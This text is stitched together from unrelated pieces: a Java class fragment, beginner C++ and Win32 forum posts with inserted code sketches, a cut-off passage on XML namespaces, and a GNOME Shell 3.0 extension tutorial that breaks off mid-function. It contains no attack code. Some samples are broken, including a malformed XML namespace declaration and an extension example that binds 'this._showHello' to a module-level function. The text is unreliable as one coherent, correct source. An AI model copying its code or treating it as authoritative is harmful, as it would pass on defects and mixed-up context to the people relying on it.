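    private String surname;

    public String getForename() { return forename; }
    public void setForename(String forename) { this.forename = forename; }
    public String getSurname() { return surname; }
    public void setSurname(String surname) { this.surname = surname; }
}
```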
xegoth (Member)
Content Count: 242
Community Reputation: 154 (Neutral)
Ugh, haven't programmed in C++ in forever, simple vector question.
xegoth replied to xegoth's topic in For Beginners's Forum
Quote (original post by Will F): "When you insert something into a standard library container, the object is not put into it. Instead a copy of the object is made."
Ah, okay. I didn't realize the STL makes a copy; the fact that it was passed by reference is what sent me down that path. Thanks.
Ugh, haven't programmed in C++ in forever, simple vector question.
xegoth posted a topic in For Beginners's Forum
I've been coding in C# for the last year or so and recently returned to C++, only to find I seem to have forgotten everything. Heh. Anyhow... given the following scenario...

class foo {
    list<std::string> m_list;
    foo(int Count) {
        for(int i = 0; i < NumSeats; i++) {
            string bar = "something";
            m_list.push_back(bar);
        }
    }
};

Okay. What happens to the data in the list? I want to think that the string is in the scope of the for loop, so it goes out of scope each time around, meaning the list is empty. What *really* happens?
Bullet/Ship Conundrum
xegoth replied to kylecrass's topic in Math and Physics
My guess is your ship is going faster than 2km/s and your bullets always fire at 2km/s. Remember, if a bullet is being fired out of a moving ship, its initial velocity is: shipVelocity + InitialBulletVelocity. This is because the bullet is ALREADY moving inside of the ship at the speed of the ship, before it's fired. Whatever the muzzle velocity is needs to be added to the ship's velocity.
What operating system do they use at work?
xegoth replied to Klohunt's topic in For Beginners's Forum
Visual Studio .NET for development, Windows OS. Then again, I work at Microsoft. :P
Binary tree puzzle. Is there an elegant solution?
xegoth replied to xegoth's topic in General and Gameplay Programming
The node to the right is the node on the same level (depth), but to the right. 1 is connected to 4, which is connected to 6. 3 is connected to 9.
Binary tree puzzle. Is there an elegant solution?
xegoth posted a topic in General and Gameplay Programming
Here's the problem: Create a function that takes a binary tree and connects each node to the node closest to its right. There has to be a really elegant solution for this using recursion... but it hasn't occurred to me yet. Anyone?
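One common way to attack this kind of puzzle (a sketch with invented names, not an answer from the thread) is a level-order traversal that links each dequeued node to the next node on the same depth:

```cpp
#include <cassert>
#include <cstddef>
#include <queue>

// Level-order (BFS) linking: every node gets a `next` pointer to the node
// immediately to its right on the same level, or nullptr at the level's end.
struct Node {
    int value;
    Node* left = nullptr;
    Node* right = nullptr;
    Node* next = nullptr;
    explicit Node(int v) : value(v) {}
};

void connectRight(Node* root) {
    if (!root) return;
    std::queue<Node*> q;
    q.push(root);
    while (!q.empty()) {
        std::size_t levelSize = q.size();
        Node* prev = nullptr;
        for (std::size_t i = 0; i < levelSize; ++i) {
            Node* cur = q.front();
            q.pop();
            if (prev) prev->next = cur;   // link left-to-right within the level
            prev = cur;
            if (cur->left) q.push(cur->left);
            if (cur->right) q.push(cur->right);
        }
    }
}
```

For a perfect binary tree, the same linking can also be done recursively in constant extra space by wiring child levels through the parents' next pointers, which may be the "elegant" recursive solution the post is after.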
Simple OO question.
xegoth replied to xegoth's topic in For Beginners's Forum
dbzprogrammer, yeah that's the answer. I just couldn't remember. Thanks :)
Simple OO question.
xegoth posted a topic in For Beginners's Forum
My C++ is unfortunately a bit rusty and I've run into a problem I don't remember how to get around. If you have the following layout:

//A.h
#ifndef _A_H_
#define _A_H_
#include "B.h"
class A {
    A() { b = new B(this); }
    B b;
};
#endif

//B.h
#ifndef _B_H_
#define _B_H_
#include "A.h"
class B {
    B(A &a);
};
#endif

The above code wouldn't compile because at the line B(A &a);, A hasn't been defined yet. How do you get around a problem like this when you want a class to pass a reference of itself to a child?
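The usual fix for this pattern (and presumably the answer acknowledged in the reply above) is a forward declaration: B only needs to know that a type named A exists in order to hold a reference to it, which breaks the circular include. A single-file sketch; the class names mirror the post, but this is not the original poster's code:

```cpp
#include <cassert>

// Forward-declaring A lets B store an A& without seeing A's definition.
class A; // forward declaration

class B {
public:
    explicit B(A& a) : a_(a) {}   // storing a reference needs no full type
    A& owner() { return a_; }
private:
    A& a_;
};

class A {
public:
    A() : b(*this) {}  // fine: B only stores the reference to the parent
    B b;
};
```

In a real project the forward declaration would live in B.h, with #include "A.h" moved into B.cpp.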
WM_PAINT is sent to parent if its child is redrawn?
xegoth replied to cpp forever's topic in General and Gameplay Programming
It looks to me like, under normal circumstances, the child window gets redrawn when the parent window gets redrawn. This makes some sense, as it would be undesirable to redraw the child window only and not the parent.
OO Dialog headache.
xegoth posted a topic in General and Gameplay Programming
I'm trying to create a class to represent a Win32 dialog in my app. The problem is, the dialog must have a proc, which can't be a non-static member of a class. Here's how I implemented it:

// Global
CConfigMenu *g_ConfigMenu = NULL;

// A callback director for the graphics settings dialog's message handler.
BOOL CALLBACK ConfigDlgProcDirector( HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam )
{
    return g_ConfigMenu->ConfigDlgProc( hDlg, message, wParam, lParam );
}

CConfigMenu::CConfigMenu() : m_pEnumeration( NULL )
{
    g_ConfigMenu = this;
}

This is all good and fine unless there is more than one instance of the class. Does anyone know of an elegant way to roll a Win32 dialog up into a class? My current way of doing it seems hackish.
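One way past the single-global limitation is to key instances by window handle. The sketch below is platform-neutral with invented names; on real Win32 the idiomatic route is instead to stash this with SetWindowLongPtr(hDlg, DWLP_USER, ...) during WM_INITDIALOG and fetch it back inside the proc:

```cpp
#include <cassert>
#include <map>

using Handle = int; // stand-in for HWND in this platform-neutral sketch

class Dialog {
public:
    explicit Dialog(Handle h) : handle_(h) { registry()[h] = this; }
    ~Dialog() { registry().erase(handle_); }

    int onMessage(int msg) { return msg * 2; } // instance-specific handling

    // The C-style callback the API would invoke; assumes h was registered.
    static int director(Handle h, int msg) {
        return registry()[h]->onMessage(msg);
    }

private:
    static std::map<Handle, Dialog*>& registry() {
        static std::map<Handle, Dialog*> r;
        return r;
    }
    Handle handle_;
};
```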
Off center fullscreen
xegoth replied to Antrim's topic in Graphics and GPU Programming
I've seen the same issue and fixed it by switching my game to a higher resolution. I don't know what caused it; for me, I wanted to run at a higher resolution anyhow, so it didn't matter. You might want to try different resolutions as a temporary solution. (Someone else here may know exactly what causes that.)
Best way to implement a loading screen?
xegoth replied to xegoth's topic in Graphics and GPU Programming
What about just a fixed image without a loading bar? Do I need to continually redraw it, or is once sufficient?
Best way to implement a loading screen?
xegoth posted a topic in Graphics and GPU Programming
I have a DirectX app that takes a bit of time to load. What I want to do is display a fullscreen bitmap (think the Counter-Strike loading screen) while the game loads. I know I have to display my image after DirectX is initialized, but what about rendering it? I won't be in a render loop because I'll be loading my level. Does anyone know of a really good way to implement a bitmap being displayed at load time? I can think of a few ways to do it, but none of them stand out as really clean and effective to me. As far as I'm concerned, I want a simple implementation that is displayed quickly.
Enum question.
xegoth replied to xegoth's topic in For Beginners's Forum
Quote (original post by Roboguy): "IIRC, the first one is invalid."
It compiles just fine for me. Does it just have no effect?
Enum question.
xegoth posted a topic in For Beginners's Forum
What's the difference between:

const enum PlacesILike { Paris, SanDiego, Hawaii }

and

enum PlacesILike { Paris, SanDiego, Hawaii }

I forget what const means in that context. :/
Unique names
URI-based namespaces
Attributes with namespaces
The Namespaces in XML specification is an extension to XML that answers the burning question: Are we talking about the same subject?
Since anyone can define element-type names, and elements from different documents can be mixed together, we need a way to clearly separate our names from other people’s names. We need to have different so-called namespaces.
We do this in the real world all of the time.
What would you do if you needed to refer to a particular John Smith without confusing him with any other John Smith? You qualify the name: "John Smith from London". That sets up a namespace that separates Londoners from everyone else.
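In XML terms, the same disambiguation is done with URI-based namespaces. A hypothetical fragment (prefixes and URIs invented for illustration):

```xml
<directory xmlns:
           xmlns:
  <!-- Both vocabularies define a "person" element; prefixes bound to
       distinct URIs keep the two names apart. -->
  <ldn:person>John Smith</ldn:person>
  <nyc:person>John Smith</nyc:person>
</directory>
```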
If that isn’t sufficient ...
of an OS plumber
[2011-11-01] This blog discusses extensions for the GNOME Shell version 3.0 and 3.1. Extensions for GNOME 3.2 are somewhat different. I will be writing a new post discussing such extensions shortly and will provide a pointer here when it is written.
The new GNOME Shell in GNOME 3 includes support for GNOME Shell extensions. What, you may ask, is a GNOME Shell extension? According to the GNOME web page on GNOME Shell.
In other ways, a GNOME Shell extension can be used to alter the existing functionality of the GNOME Shell or to provide additional functionality.
This post assumes that you are familiar with the GNOME 3 Shell provided in Fedora 15 and have a working knowledge of JavaScript. By means of a number of examples, it will introduce you to some of the key concepts required to write your own extension. As with a lot of my posts, this post will be a living document and will be edited from time to time to correct errors and add more examples.
So how should you go about creating a GNOME Shell extension? Let us dive in and create a simple extension and explain the concepts and theory as we go along. We will use gnome-shell-extension-tool for our first example. This tool is available in Fedora 15 Alpha. I am not sure whether it is available on other GNU/Linux distributions. There is no manpage for this tool but it is simple to use. Just answer a couple of questions and all the necessary files are created for you.
$ gnome-shell-extension-tool --help
Usage: gnome-shell-extension-tool [options]
Options:
-h, --help show this help message and exit
--create-extension Create a new GNOME Shell extension
Example 1:
Suppose I use this gnome-shell-extension-tool to create an extension named helloworld with a UUID of helloworld@example.com and a description of My first GNOME 3 Shell extension. The tool, which is just a Python script, creates an appropriately named subdirectory (actually the UUID of the extension) under ~/.local/share/gnome-shell/extensions and populates that subdirectory with three files. Note that the UUID can be a classical 128-bit number, some other number or alphanumeric combination, or something more mundane like helloworld@example.com. So long as it can be used to create a subdirectory, it will be regarded as a valid UUID.
$ cd .local/share/gnome-shell/extensions
$ find ./
./helloworld@example.com
./helloworld@example.com/stylesheet.css
./helloworld@example.com/extension.js
./helloworld@example.com/metadata.json
$ cd helloworld@example.com
$ ls -l
-rw-rw-r--. 1 fpm fpm 718 Mar 31 00:24 extension.js
-rw-rw-r--. 1 fpm fpm 137 Mar 31 00:23 metadata.json
-rw-rw-r--. 1 fpm fpm 177 Mar 31 00:23 stylesheet.css
Here are the contents of these three files:
$ cat metadata.json
{
"shell-version": ["2.91.92"],
"uuid": "helloworld@example.com",
"name": "helloworld",
"description": "My first GNOME 3 Shell extension"
}
$ cat extension.js
//
// Sample extension code, makes clicking on the panel show a message
//
const St = imports.gi.St;
const Mainloop = imports.mainloop;

const Main = imports.ui.main;

function _showHello() {
    let text = new St.Label({ style_class: 'helloworld-label',
                              text: "Hello, world!" });
    global.stage.add_actor(text);
    let monitor = global.get_primary_monitor();
    text.set_position(Math.floor(monitor.width / 2 - text.width / 2),
                      Math.floor(monitor.height / 2 - text.height / 2));
    Mainloop.timeout_add(3000, function () { text.destroy(); });
}

// Put your extension initialization code here
function main() {
    Main.panel.actor.reactive = true;
    Main.panel.actor.connect('button-release-event', _showHello);
}
$ cat stylesheet.css
/* Example stylesheet */
.helloworld-label {
font-size: 36px;
font-weight: bold;
color: #ffffff;
background-color: rgba(10,10,10,0.7);
border-radius: 5px;
}
What is created is a very simple extension that displays a message, Hello, world!, in the middle of your screen as shown below whenever you click the panel (the horizontal bar at the top of your screen in the GNOME 3 Shell) or make a menu selection.
This extension is created under ~/.local/share/gnome-shell/extensions which is the designated location for per user extensions. Note that ~/.local is also used for other purposes, not just for per user extensions.
$ find .local
.local
.local/share
.local/share/gnome-shell
.local/share/gnome-shell/extensions
.local/share/gnome-shell/extensions/helloworld@example.com
.local/share/gnome-shell/extensions/helloworld@example.com/stylesheet.css
.local/share/gnome-shell/extensions/helloworld@example.com/extension.js
.local/share/gnome-shell/extensions/helloworld@example.com/metadata.json
.local/share/gnome-shell/application_state
.local/share/icc
.local/share/icc/edid-67c2e64687cb4fd59883902829614117.icc
.local/share/gsettings-data-convert
Global (system-wide) extensions should be placed in either /usr/share/gnome-shell/extensions or /usr/local/share/gnome-shell/extensions.
By the way, I really wish the GNOME developers would stop creating more and more hidden subdirectories in a user's home directory! It would be really nice if everything to do with GNOME 3 was located under, say, .gnome3.
Notice that the actual code for the extension is written in JavaScript and contained in a file called extension.js. This file is mandatory and is what gets loaded into GNOME Shell. At a minimum, it must contain a main() function which is invoked immediately after the extension is loaded by GNOME shell.
The JavaScript language version is 1.8 (which is a Mozilla extension to ECMAscript 262.) This is why non-standard JavaScript keywords like let are supported in shell extensions. The actual JavaScript engine (called gjs) is based on the Mozilla SpiderMonkey JavaScript engine and the GObject introspection framework.
Interestingly, a gjs shell is provided, but unfortunately most of the shell functionality present in SpiderMonkey, such as quit(), does not appear to be supported in this particular JavaScript shell.
$ gjs
** (gjs:11363): DEBUG: Command line: gjs
** (gjs:11363): DEBUG: Creating new context to eval console script
gjs> help()
ReferenceError: help is not defined
gjs> quit()
ReferenceError: quit is not defined
gjs>
Persistent metadata for the extension is stored in the file metadata.json which uses the JSON file format. JSON was chosen because it is natively supported by JavaScript. The currently defined strings are uuid, name, description and shell-version, plus optionally url and a gjs version.
There is nothing stopping you adding additional strings to this file. In some cases this may be useful as the contents of metadata.json are passed as an argument to the main() function in extension.js.
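Because metadata.json is plain JSON, the kind of check the extension system performs against shell-version is easy to picture in ordinary JavaScript. The sketch below runs outside the shell and is only an approximation of what extensionSystem.js does, not the exact upstream logic:

```javascript
// Sketch: validate a metadata.json blob against the running shell version.
// Approximation only -- extensionSystem.js's real check differs in detail.
var metadataText = JSON.stringify({
    "shell-version": ["2.91.91", "2.91.92"],
    "uuid": "helloworld@example.com",
    "name": "helloworld",
    "description": "My first GNOME 3 Shell extension"
});

function isCompatible(text, shellVersion) {
    var meta = JSON.parse(text);                   // JSON is native to JavaScript
    var versions = meta["shell-version"] || [];
    return versions.indexOf(shellVersion) !== -1;  // simple exact-match check
}

console.log(isCompatible(metadataText, "2.91.92")); // true
console.log(isCompatible(metadataText, "3.0.0"));   // false
```

An extension whose shell-version list does not include the running version is marked "out of date" rather than loaded.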
The third file is stylesheet.css. This contains all the CSS (Cascading Style Sheet) information for your extension. This file is not required if your particular extension does not require its own presentation markup.
Example 2:
What if we want to display localized message strings (always a good idea!) in our helloworld shell extension? In this case we need to modify extension.js to support message catalogs and we need to provide and install the relevant message catalogs in the appropriate directories.
The GNOME Shell uses the standard GNU/Linux gettext paradigm. I am going to assume that you are somewhat familiar with software localization and how to use gettext. A whole post could be devoted to the use of gettext but that is not the purpose of this post.
Fortunately the heavy lifting has been done for us by others and a JavaScript binding to gettext is available to us. We import the necessary JavaScript gettext module into the helloworld shell extension using imports and modify the code to use Gettext.gettext(“message string”) to retrieve the localized version of the message string if provided in a message catalog.
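Conceptually, the gettext paradigm is just a catalog lookup keyed on the original message string, falling back to that string when no translation exists. The toy model below in plain JavaScript is illustrative only; the real gjs binding wraps GNU gettext and reads compiled .mo catalogs:

```javascript
// Toy model of the gettext paradigm: look the message id up in the current
// locale's catalog and fall back to the id itself when no translation exists.
// Illustrative only -- the real binding reads compiled .mo files.
var catalogs = {
    "fr_FR": { "Hello, world!": "Bonjour, monde!" }
};

var currentLocale = "fr_FR";

function gettext(msgid) {
    var catalog = catalogs[currentLocale] || {};
    return catalog[msgid] || msgid;   // untranslated strings pass through
}

console.log(gettext("Hello, world!"));  // "Bonjour, monde!"
currentLocale = "de_DE";                // no catalog installed for de_DE
console.log(gettext("Hello, world!"));  // falls back to "Hello, world!"
```

The fallback behaviour is why an untranslated locale simply shows the original English string rather than failing.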
Normally compiled gettext message catalogs (.mo files) are placed under /usr/share/locale on GNU/Linux distributions. However I do not think that this is a good location for extension message catalogs as I believe that extensions should be as self-contained as possible to aid in their easy installation and removal. It also avoids the possibility of message catalog namespace collisions. For this reason, we place the message catalogs in a subdirectory called locale under the top directory of the extension.
By way of example, here is a listing of the files for our helloworld extension after it has been modified to support message localization and message catalogs for en_US and fr_FR locales provided.
./helloworld@example.com
./helloworld@example.com/stylesheet.css
./helloworld@example.com/extension.js
./helloworld@example.com/locale
./helloworld@example.com/locale/fr_FR
./helloworld@example.com/locale/fr_FR/LC_MESSAGES
./helloworld@example.com/locale/fr_FR/LC_MESSAGES/helloworld.mo
./helloworld@example.com/locale/fr_FR/LC_MESSAGES/helloworld.po
./helloworld@example.com/locale/en_US
./helloworld@example.com/locale/en_US/LC_MESSAGES
./helloworld@example.com/locale/en_US/LC_MESSAGES/helloworld.mo
./helloworld@example.com/locale/en_US/LC_MESSAGES/helloworld.po
./helloworld@example.com/metadata.json
As you can see I have provided support for two locales, en_US for Americanese speakers and fr_FR for French speakers. The default message string Hello, world! will be displayed if neither of these two locales is set. Only the .mo files are necessary but I suggest that the corresponding .po files also reside there to make it easy to update a message catalog.
Here is our extension.js after it was modified to support message string localization:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Gettext = imports.gettext;
function _showHello() {
    let text = new St.Label({ style_class: 'helloworld-label',
                              text: Gettext.gettext("Hello, world!") });
    global.stage.add_actor(text);
    let monitor = global.get_primary_monitor();
    text.set_position(Math.floor(monitor.width / 2 - text.width / 2),
                      Math.floor(monitor.height / 2 - text.height / 2));
    Mainloop.timeout_add(3000, function () { text.destroy(); });
}

function main(extensionMeta) {
    let localePath = extensionMeta.path + '/locale';
    Gettext.bindtextdomain('helloworld', localePath);
    Gettext.textdomain('helloworld');

    Main.panel.actor.reactive = true;
    Main.panel.actor.connect('button-release-event', _showHello);
}
Note that the main function now has one parameter extensionMeta. This is an object that contains all the information from the extension’s metadata.json file. This is the only parameter available to the main function in an extension. See the loadExtension function in /usr/share/gnome-shell/js/ui/extensionSystem.js for further details.
This parameter is used to build the path to the shell extension locale subdirectory. We then tell gettext that we want to use message catalogs from this subdirectory using bindtextdomain and specify the relevant message catalog, helloworld.mo, using textdomain.
Here is what is displayed when the locale is set to en_US:
and here is what is displayed when the locale set to fr_FR
If no suitable message catalog is found, the message string Hello, world! will be displayed.
Example 3:
This example shows you how to modify our helloworld example extension to add a menu item to the Status Menu (the menu at the top right hand corner) of your primary display and output the Hello, world! message.
Here is the modified extension.js:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Shell = imports.gi.Shell;
const Lang = imports.lang;
const PopupMenu = imports.ui.popupMenu;
const Gettext = imports.gettext;
const _ = Gettext.gettext;

function _showHello() {
    let text = new St.Label({ style_class: 'helloworld-label',
                              text: _("Hello, world!") });
    global.stage.add_actor(text);
    let monitor = global.get_primary_monitor();
    text.set_position(Math.floor(monitor.width / 2 - text.width / 2),
                      Math.floor(monitor.height / 2 - text.height / 2));
    Mainloop.timeout_add(3000, function () { text.destroy(); });
}

function main(extensionMeta) {
    let localePath = extensionMeta.path + '/locale';
    Gettext.bindtextdomain('helloworld', localePath);
    Gettext.textdomain('helloworld');

    let statusMenu = Main.panel._statusmenu;
    // use this in future: let statusMenu = Main.panel._userMenu;

    let item = new PopupMenu.PopupSeparatorMenuItem();
    statusMenu.menu.addMenuItem(item);
    item = new PopupMenu.PopupMenuItem(_("Hello"));
    item.connect('activate', Lang.bind(this, this._showHello));
    statusMenu.menu.addMenuItem(item);
}
Note the use of const _ to make message strings more legible in the source code.
Notice how we increased the size of the message box. No code changes were required; we simply edited the relevant styling markup. Here is the new version of stylesheet.css
.helloworld-label {
font-size: 36px;
font-weight: bold;
color: #ffffff;
background-color: rgba(10,10,10,0.7);
border-radius: 15px;
margin: 50px;
padding: 50px;
}
Example 4:
This example modifies the previous example to display a message in the GNOME Shell message tray.
Here is the modified extension.js:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Shell = imports.gi.Shell;
const Lang = imports.lang;
const PopupMenu = imports.ui.popupMenu;
const Gettext = imports.gettext;
const MessageTray = imports.ui.messageTray;
const _ = Gettext.gettext;
function _myNotify(text) {
    global.log("_myNotify called: " + text);

    let source = new MessageTray.SystemNotificationSource();
    Main.messageTray.add(source);
    let notification = new MessageTray.Notification(source, text, null);
    notification.setTransient(true);
    source.notify(notification);
}

function _showHello() {
    _myNotify(_("Hello, world!"));
}

function main() {
    let statusMenu = Main.panel._statusmenu;

    let item = new PopupMenu.PopupSeparatorMenuItem();
    statusMenu.menu.addMenuItem(item);
    item = new PopupMenu.PopupMenuItem(_("Hello, world!"));
    item.connect('activate', Lang.bind(this, this._showHello));
    statusMenu.menu.addMenuItem(item);
}
Note the use of global.log to log a message to the error log. This log can be viewed in Looking Glass. This is useful when debugging an extension.
Example 5:
This example demonstrates how to modify our helloworld extension to add a button to the panel; pressing the button displays a single-option menu, and selecting that menu item displays our Hello, world! message.
Here is the modified extension.js:
const St = imports.gi.St;
const Mainloop = imports.mainloop;
const Main = imports.ui.main;
const Shell = imports.gi.Shell;
const Lang = imports.lang;
const PopupMenu = imports.ui.popupMenu;
const PanelMenu = imports.ui.panelMenu;
const Gettext = imports.gettext;
const MessageTray = imports.ui.messageTray;
const _ = Gettext.gettext;
function _myButton() {
    this._init();
}

_myButton.prototype = {
    __proto__: PanelMenu.Button.prototype,

    _init: function() {
        PanelMenu.Button.prototype._init.call(this, 0.0);

        this._label = new St.Label({ style_class: 'panel-label',
                                     text: _("HelloWorld Button") });
        this.actor.set_child(this._label);
        Main.panel._centerBox.add(this.actor, { y_fill: true });

        this._myMenu = new PopupMenu.PopupMenuItem(_('HelloWorld MenuItem'));
        this.menu.addMenuItem(this._myMenu);
        this._myMenu.connect('activate', Lang.bind(this, _showHello));
    },

    _onDestroy: function() {}
};

function _showHello() {
    let text = new St.Label({ style_class: 'helloworld-label',
                              text: _("Hello, world!") });
    global.stage.add_actor(text);
    let monitor = global.get_primary_monitor();
    text.set_position(Math.floor(monitor.width / 2 - text.width / 2),
                      Math.floor(monitor.height / 2 - text.height / 2));
    Mainloop.timeout_add(3000, function () { text.destroy(); });
}

function main() {
    let _myPanelButton = new _myButton();
}
Here is the modified stylesheet.css
.panel-label {
padding: .4em 1.75em;
font-size: 10.5pt;
color: #cccccc;
font-weight: bold;
}
.helloworld-label {
font-size: 36px;
font-weight: bold;
color: #ffffff;
background-color: rgba(10,10,10,0.7);
border-radius: 15px;
margin: 50px;
padding: 50px;
}
Example 6:
This example demonstrates how to modify our helloworld extension to change the hotspot button to display the Fedora logo in the upper left corner instead of the string Activities.
Here is the modified extension.js. As you can see, it contains only a few lines of JavaScript.
const St = imports.gi.St;
const Main = imports.ui.main;
function main() {
    let hotCornerButton = Main.panel.button;
    let logo = new St.Icon({ icon_type: St.IconType.FULLCOLOR,
                             icon_size: hotCornerButton.height,
                             icon_name: 'fedora-logo-icon' });
    let box = new St.BoxLayout();
    box.add_actor(logo);
    Main.panel.button.set_child(box);
}
No stylesheet.css is required as this particular extension is not using any presentation markup.
Example 7:
This example demonstrates how to remove the Computer Accessibility (AKA a11y) icon and menu from the status tray in the panel.
Consider the following extension.js. As you can see, it contains only a few lines of JavaScript.
const Panel = imports.ui.panel;

function main() {
    Panel.STANDARD_TRAY_ICON_SHELL_IMPLEMENTATION['a11y'] = '';
}
No stylesheet.css is required since the extension uses no presentation markup. This solution works; you no longer see the a11y status icon. However, a SystemStatusButton object (see panelMenu.js) is left dangling. A better approach is to do something like the following:
const Panel = imports.ui.panel;

function main() {
    let index = Panel.STANDARD_TRAY_ICON_ORDER.indexOf('a11y');
    if (index >= 0) {
        Panel.STANDARD_TRAY_ICON_ORDER.splice(index, 1);
    }
    delete Panel.STANDARD_TRAY_ICON_SHELL_IMPLEMENTATION['a11y'];
}
This extension is available as noa11y-1.0.tar.gz in the extensions area of my website.
Let us turn now to the question of how to determine which GNOME Shell extensions are loaded and what information is available about the state of such extensions. Currently no distribution provides a tool to list information about extensions.
Here is a small Python utility which lists the details of all your GNOME Shell extensions on the command line:
#!/usr/bin/python
#
#
# This utility is free software. You can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 2 of
# the License, or (at your option) any later version.
#
# This utility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# See <> for full text of the license.
#
import os.path
import json

from gi.repository import Gio
from gi.repository import GLib

state = {1: "enabled", 2: "disabled", 3: "error", 4: "out of date"}
type = {1: "system", 2: "per user"}


class GnomeShell:
    def __init__(self):
        d = Gio.bus_get_sync(Gio.BusType.SESSION, None)
        self._proxy = Gio.DBusProxy.new_sync(
            d, 0, None,
            'org.gnome.Shell',
            '/org/gnome/Shell',
            'org.gnome.Shell',
            None)

    def execute_javascript(self, js):
        result, output = self._proxy.Eval('(s)', js)
        if not result:
            raise Exception(output)
        return output

    def list_extensions(self):
        out = self.execute_javascript('const ExtensionSystem = imports.ui.extensionSystem; ExtensionSystem.extensionMeta')
        return json.loads(out)

    def get_shell_version(self):
        out = self.execute_javascript('const Config = imports.misc.config; version = Config.PACKAGE_VERSION')
        return out

    def get_gjs_version(self):
        out = self.execute_javascript('const Config = imports.misc.config; version = Config.GJS_VERSION')
        return out


if __name__ == "__main__":
    s = GnomeShell()
    print
    print "Shell Version:", s.get_shell_version()
    print "  GJS Version:", s.get_gjs_version()
    print

    l = s.list_extensions()
    for k, v in l.iteritems():
        print 'Extension: %s' % k
        print "-" * (len(k) + 11)
        for k1, v1 in v.iteritems():
            if k1 == 'state':
                print '%15s: %s (%s)' % (k1, v1, state[v1])
            elif k1 == 'type':
                print '%15s: %s (%s)' % (k1, v1, type[v1])
            elif k1 == 'shell-version':
                print '%15s:' % k1,
                print ", ".join(v1)
            else:
                print '%15s: %s' % (k1, v1)
        print
Here is the output for our HelloWorld example extension:
Shell Version: "3.0.0"
GJS Version: "0.7.13"
Extension: helloworld@example.com
---------------------------------
description: My first GNOME 3 Shell extension
shell-version: 2.91.91, 2.91.92, 2.91.93
name: helloworld
url:
state: 1 (enabled)
path: /home/fpm/.local/share/gnome-shell/extensions/helloworld@example.com
type: 2 (per user)
uuid: helloworld@example.com
You can also see which extensions are loaded using the Looking Glass debugger which is accessible via Alt-F2 lg. Unfortunately, the current version of Looking Glass displays very little information about extensions other than the fact that they are loaded, but that is easily remedied by adding a few lines of JavaScript to /usr/share/gnome-shell/js/ui/lookingGlass.js.
$ diff lookingGlass.js.org lookingGlass.js
621a622,631
> _typeToString: function(extensionType) {
> switch (extensionType) {
> case ExtensionSystem.ExtensionType.SYSTEM:
> return _("System");
> case ExtensionSystem.ExtensionType.PER_USER:
> return _("Per User");
> }
> return 'Unknown';
> },
>
637a648
> let line1Box = new St.BoxLayout();
640d650
< box.add(name, { expand: true });
642,643c652,655
< text: meta.description });
< box.add(description, { expand: true });
---
> text: " " + meta.description });
> line1Box.add(name, { expand: false });
> line1Box.add(description, { expand: false });
> box.add(line1Box);
645,647d656
< let metaBox = new St.BoxLayout();
< box.add(metaBox);
< let stateString = this._stateToString(meta.state);
649c658,667
< text: this._stateToString(meta.state) });
---
> text: " State: " + this._stateToString(meta.state)+", " });
> let type = new St.Label({ style_class: 'lg-extension-state',
> text: "Type: " + this._typeToString(meta.type)+", " });
> let uuid = new St.Label({ style_class: 'lg-extension-state',
> text: "UUID: " + meta.uuid });
>
> let metaDataBox = new St.BoxLayout();
> metaDataBox.add(state, { expand: false });
> metaDataBox.add(type, { expand: false });
> metaDataBox.add(uuid, { expand: false });
650a669,670
> let metaBox = new St.BoxLayout();
> box.add(metaBox);
666a687,690
> actionsBox.add(metaDataBox);
Here is what is displayed by the modified Looking Glass for our HelloWorld extension:
How do you disable or enable installed extensions? By default, all extensions are enabled provided they match the current GNOME Shell version number (and the gjs version number if one is provided in metadata.json.) You can disable extensions from the command line using the gsettings utility. You should also be able to disable extensions using dconf-editor but this utility is broken as of the date of this post (and seems to be always broken for some reason or other) so I cannot test it. At present there is no specific GUI-based utility to disable or enable extensions.
$ gsettings list-recursively org.gnome.shell
org.gnome.shell command-history @as []
org.gnome.shell development-tools true
org.gnome.shell disabled-extensions @as []
org.gnome.shell disabled-open-search-providers @as []
org.gnome.shell enable-app-monitoring true
org.gnome.shell favorite-apps ['mozilla-firefox.desktop', 'evolution.desktop', 'empathy.desktop', 'rhythmbox.desktop', 'shotwell.desktop', 'openoffice.org-writer.desktop', 'nautilus.desktop']
org.gnome.shell looking-glass-history @as []
org.gnome.shell.calendar show-weekdate false
org.gnome.shell.clock show-date false
org.gnome.shell.clock show-seconds false
org.gnome.shell.recorder file-extension 'webm'
org.gnome.shell.recorder framerate 15
org.gnome.shell.recorder pipeline ''
[root@ultra noarch]#
The requisite key is disabled-extensions
$ gsettings get org.gnome.shell disabled-extensions
@as []
The @as [] syntax is output whenever there are no disabled GNOME Shell extensions. It indicates a serialized GVariant. A GVariant is a variant datatype; it stores a value along with the type of that value.
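To see why the annotation is needed, here is a small sketch in plain JavaScript (illustrative only, not shell code) of how an array of UUIDs maps to GVariant text format. An empty array must carry the @as (array of strings) type annotation because a bare [] does not tell GVariant the element type:

```javascript
// Sketch: format a JavaScript array of UUIDs as the GVariant text that
// gsettings expects. An empty array needs the "@as []" type annotation
// because [] alone does not determine the element type.
function toGVariantText(uuids) {
    if (uuids.length === 0)
        return "@as []";
    return "[" + uuids.map(function (u) {
        return "'" + u + "'";
    }).join(", ") + "]";
}

console.log(toGVariantText([]));                          // @as []
console.log(toGVariantText(['helloworld@example.com']));  // ['helloworld@example.com']
```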
To disable an extension, simply add the UUID of the extension to the disabled-extensions key, log out and log back in, or reload the GNOME Shell using Alt-F2 r. Note that disabling an extension does not stop it operating once it has been loaded into the GNOME Shell; it merely stops it being loaded in the first place.
$ gsettings set org.gnome.shell disabled-extensions "['helloworld@example.com']"
By the way, gsettings does not handle incrementally adding an extension's UUID to the disabled-extensions key, nor removing a single value; a set simply overwrites whatever is there. You first have to reset the key and then set the key with the complete new list of values.
$ gsettings reset org.gnome.shell disabled-extensions
$ gsettings set org.gnome.shell disabled-extensions "['helloworld@example.com']"
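The read-modify-write dance that these two commands perform by hand can be sketched in plain JavaScript. This is an illustration rather than anything the shell provides; the input array stands in for the value read back from the gsettings get command:

```javascript
// Sketch of adding one UUID to the disabled-extensions list without
// clobbering the entries already present. The input array stands in for
// the value read from "gsettings get org.gnome.shell disabled-extensions".
function addDisabled(current, uuid) {
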